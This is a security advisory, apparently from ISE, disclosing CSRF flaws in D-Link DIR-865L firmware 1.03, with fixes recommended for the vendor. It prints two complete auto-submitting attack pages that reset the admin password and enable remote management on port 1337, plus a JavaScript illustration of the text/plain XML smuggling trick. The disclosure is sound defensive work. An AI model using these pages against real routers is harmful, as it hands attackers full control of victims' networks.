- The DIR865L can be taken over by a remote adversary through a CSRF attack.
Description
The DIR865L router is susceptible to several CSRF attacks, which allow an attacker to forge HTML forms and execute actions on behalf of a legitimate user. ISE created a proof of concept that, when executed by an unsuspecting device administrator, changes the administrator credentials and enables remote management services.
Attack Requirements
- The victim must have an active management session with the router.
- The victim must be tricked into performing an action (e.g., clicking an attacker-provided link), must browse to a malicious or compromised site, or must be subject to a man-in-the-middle attack.
Details
All HTML forms present in the D-Link DIR865L are susceptible to Cross-Site Request Forgery.
- Vulnerable firmware: version 1.03.
- Other firmware versions were not tested.
Impact
A successful attack exploiting this vulnerability can give a remote adversary full control of the victim router.
Recommendations to the vendor
- Cross-Site Request Forgery can be prevented by including an unpredictable token in each state-changing HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user session; it is recommended that each HTML form delivered contain its own unique token.
- In addition to HTML form tokens, HTTP Referer (or Origin) header checking should be enabled.
- Validate the HTTP Basic Authentication header on every request. Note that a browser attaches cached Basic credentials to cross-site requests automatically, so this check alone does not stop CSRF.
- Additional information for vendors regarding immediate and long-term fixes for these issues can be found on our summary page.
Recommendations to device administrators
- (4/13/2013) No firmware upgrade that remedies this vulnerability is currently available.
- Take additional preventative measures and precautions by following the steps outlined on our summary page.
Proof of Concept
In the following proof of concept, we assume that a device administrator with an active management session on the router has browsed to a malicious web page. Once there, the page automatically submits a series of forms, one after the other, from the administrator's browser to the administrator's router. Because the administrator has a current session with the router, the submissions are processed.
The first form (Figure 1) is pre-filled with the XML required to set the administrator password to "ISE" and enable remote management on port 1337; it uses enctype="text/plain" so that the field name and value are sent to hedwig.cgi as one concatenated XML body. The second form (Figure 2) completes the action by instructing the router to save and activate the settings it has been given.
<html>
<head>
<title> D-LINK DIR-865L CSRF</title>
<!-- Firmware Version: 1.03 Fri 02 Nov 2012 -->
</head>
<body>
<form name="dlinkXML" action="http://192.168.0.1/hedwig.cgi"
enctype="text/plain" method="post">
<input type="hidden" name="<?xml version" value="'1.0' encoding='UTF-8'?>
<postxml>
<module>
<service>DEVICE.ACCOUNT</service>
<device>
<gw_name>DIR-865L</gw_name>
<account>
<seqno>1</seqno>
<max>2</max>
<count>1</count>
<entry>
<uid>USR-</uid>
<name>Admin</name>
<usrid/>
<password>ISE</password>
<group>0</group>
<description/>
</entry>
</account>
<group>
<seqno/>
<max/>
<count>0</count>
</group>
<session>
<captcha>0</captcha>
<dummy/>
<timeout>600</timeout>
<maxsession>128</maxsession>
<maxauthorized>16</maxauthorized>
</session>
</device>
</module>
<module>
<service>HTTP.WAN-1</service>
<inf>
<web>1337</web>
<https_rport></https_rport>
<stunnel>1</stunnel>
<weballow>
<hostv4ip/>
</weballow>
<inbfilter></inbfilter>
</inf>
</module>
<module>
<service>HTTP.WAN-2</service>
<inf>
<web>1337</web>
<weballow></weballow>
</inf>
</module>
<module>
<service>INBFILTER</service>
<acl>
<inbfilter>
<seqno>1</seqno>
<max>24</max>
<count>0</count>
</inbfilter>
</acl>
<ACTIVATE>ignore</ACTIVATE>
<FATLADY>ignore</FATLADY>
<SETCFG>ignore</SETCFG>
</module>
<module>
<service>SHAREPORT</service>
<FATLADY>ignore</FATLADY>
<ACTIVATE>ignore</ACTIVATE>
</module>
</postxml>">
</form>
<script>
// Submit the XML form, then open attack page 2 (Figure 2), hosted on 192.168.0.100.
function CSRF1() { document.dlinkXML.submit(); }
window.setTimeout(CSRF1, 1000);
function CSRF2() { window.open("http://192.168.0.100/dlinkCSRF2.html"); }
window.setTimeout(CSRF2, 1000);
</script>
</body>
</html>
Figure 1. Attack page 1.
<html>
<head>
<title> D-LINK DIR-865L CSRF</title>
<!-- Firmware: 1.03 Fri 02 Nov 2012 -->
</head>
<body>
<form name="DLINK" action="http://192.168.0.1/pigwidgeon.cgi" method="post">
<input type="hidden" name="ACTIONS" value="SETCFG,SAVE,ACTIVATE">
</form>
<script>
document.DLINK.submit()
</script>
</body>
</html>
Figure 2. Attack page 2.
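As an added illustration, not part of the ISE advisory, the following JavaScript reproduces how a browser serialises a text/plain form and shows why the field name "<?xml version" in Figure 1 turns the POST body into a document that begins with a valid XML declaration. The trimmed XML value and the tag extractor are constructed for the example; the real hedwig.cgi parser is not shown on this page.

```javascript
// Added example, not code from the ISE advisory: how a text/plain form
// becomes an XML document on the wire.
//
// With enctype="text/plain" a browser serialises every field as
//     name=value<CR><LF>
// and escapes nothing. A field named "<?xml version" whose value begins
// "'1.0' encoding='UTF-8'?>" therefore yields a body that starts with a
// well-formed XML declaration, which is what the Figure 1 page relies on.

// Mirrors the HTML "text/plain encoding algorithm" for a list of
// [name, value] pairs; line breaks inside values are normalised to CRLF.
function encodeTextPlain(fields) {
  return fields
    .map(([name, value]) =>
      `${name}=${String(value).replace(/\r\n|\n|\r/g, "\r\n")}\r\n`)
    .join("");
}

// Constructed sample: a trimmed version of the Figure 1 payload. The value
// deliberately starts with the remainder of the XML declaration.
const POC_XML_VALUE = [
  "'1.0' encoding='UTF-8'?>",
  "<postxml>",
  "<module>",
  "<service>DEVICE.ACCOUNT</service>",
  "<device><account><entry>",
  "<name>Admin</name><password>ISE</password>",
  "</entry></account></device>",
  "</module>",
  "</postxml>",
].join("\n");

function buildPocBody() {
  return encodeTextPlain([["<?xml version", POC_XML_VALUE]]);
}

// True if the body would pass as an XML document to a parser that reads the
// body without looking at the Content-Type header. The trailing CRLF the
// browser appends after </postxml> is whitespace an XML parser tolerates.
function looksLikeXmlDocument(body) {
  return /^<\?xml version='1\.0' encoding='UTF-8'\?>\r\n<postxml>/.test(body);
}

// Minimal stand-in for what a CGI does with the parsed document: pull the
// text of the first <tag>...</tag> element.
function extractTag(body, tag) {
  const m = body.match(new RegExp(`<${tag}>([^<]*)</${tag}>`));
  return m ? m[1] : null;
}

console.log(buildPocBody());
```

The same trick works against any endpoint that parses a POST body as XML or JSON without checking the Content-Type, since text/plain is one of the three encodings an HTML form can send cross-site without a preflight.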
At this point the attacker can log in to the remote management interface on port 1337 with the new credentials and administer, and thereby fully control, the router.
References
- CVE-2013-3095: Cross-Site Request Forgery
- CVE-2013-3096: Unauthenticated Hardware Linking
Credit
- Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
Contact Information
- For more information on this particular D-Link hack, you can contact us at routers@www.ise.io
- Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io